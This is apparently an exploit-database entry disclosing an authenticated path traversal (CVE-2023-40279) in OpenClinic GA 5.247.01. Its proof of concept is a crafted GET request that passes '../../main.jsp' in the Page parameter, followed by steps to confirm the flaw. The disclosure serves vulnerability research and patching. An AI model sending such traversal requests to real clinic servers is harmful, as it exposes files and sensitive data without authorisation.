OpenClinic GA 5.247.01 - Path Traversal (Authenticated)
Author: VB
type: webapps
platform: php
port:
date_added: 2024-04-15
date_updated: 2024-04-15
verified: 0
codes: CVE-2023-40279
tags:
aliases:
screenshot_url:
application_url:
raw file: 51995.md
type: webapps
platform: php
port:
date_added: 2024-04-15
date_updated: 2024-04-15
verified: 0
codes: CVE-2023-40279
tags:
aliases:
screenshot_url:
application_url:
raw file: 51995.md
# Exploit Title: OpenClinic GA 5.247.01 - Path Traversal (Authenticated) # Date: 2023-08-14 # Exploit Author: V. B. # Vendor Homepage: https://sourceforge.net/projects/open-clinic/ # Software Link: https://sourceforge.net/projects/open-clinic/ # Version: OpenClinic GA 5.247.01 # Tested on: Windows 10, Windows 11 # CVE: CVE-2023-40279 # Details An issue was discovered in OpenClinic GA version 5.247.01, where an attacker can perform a directory path traversal via the 'Page' parameter in a GET request to 'main.do'. This vulnerability allows for the retrieval and execution of files from arbitrary directories. # Proof of Concept (POC) Steps to Reproduce: - Crafting the Malicious GET Request: - Utilize a web browser or a tool capable of sending custom HTTP requests, such as curl or Burp Suite. - Format the GET request as follows (in this example, `../../main.jsp` is used to attempt directory traversal to access `main.jsp`): GET /openclinic/main.do?Page=../../main.jsp HTTP/1.1 Host: 192.168.100.5:10088 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 Connection: close Cookie: JSESSIONID=[SESSION ID] Cache-Control: max-age=0 2. Confirming the Vulnerability: - Send the crafted GET request to the target server. - If the server responds with the content of the requested file (e.g., `main.jsp`) from outside the intended directory, it confirms the presence of a directory path traversal vulnerability. - This vulnerability can lead to sensitive information disclosure or more severe attacks.
Copyright © 2024 Irfan TOOR all rights reserved.